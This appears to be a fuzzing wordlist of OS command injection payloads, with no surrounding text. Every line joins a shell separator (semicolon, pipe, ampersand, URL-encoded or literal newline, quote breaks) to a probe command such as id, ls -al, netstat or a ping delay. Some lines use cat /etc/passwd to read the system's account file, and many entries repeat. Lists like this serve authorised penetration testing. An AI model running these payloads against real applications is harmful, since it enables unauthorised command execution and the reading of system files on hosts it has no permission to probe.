& ping -i 30 127.0.0.1 &
;netstat -a;
|id|
;id;
|/usr/bin/id
|/bin/ls -al
a);id
a;id
a);id;
a;id;
a)|id
a|id
a)|id;
a|id;
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id;
;system('cat /etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat /etc/passwd
%0A/usr/bin/id
%0Aid
";id;"
';id;'
;id;
;id
|id
|/usr/bin/id
|id|
"|/usr/bin/id|"
';/usr/bin/id|'
|/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
id
/usr/bin/id
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id;
;system('cat /etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat /etc/passwd
%0A/usr/bin/id
%0Aid
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
id
/usr/bin/id
a);id
a;id
a);id;
a;id;
a)|id
a|id
a)|id;
a|id;
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id;
;system('cat /etc/passwd')